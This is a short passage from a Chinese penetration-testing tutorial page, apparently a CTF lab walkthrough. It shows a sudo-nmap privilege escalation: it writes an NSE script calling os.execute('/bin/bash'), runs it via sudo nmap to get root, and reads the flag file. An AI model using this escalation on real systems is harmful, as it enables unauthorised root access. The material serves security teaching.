渗透测试全套教程,渗透测试能干到多少岁

首页 > 经验 > 作者:YD1662022-11-13 22:58:15

0x03 找到提权点

sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本

echo "os.execute('/bin/bash')">demon.nse

nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)

渗透测试全套教程,渗透测试能干到多少岁(33)

sudo nmap --script=/home/jens/demon.nse

执行此脚本

渗透测试全套教程,渗透测试能干到多少岁(34)

提权成功

渗透测试全套教程,渗透测试能干到多少岁(35)

进入到root,找到flag

cat /root/theflag.txt

渗透测试全套教程,渗透测试能干到多少岁(36)

上一页56789下一页

栏目热文

文档排行

本站推荐

Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.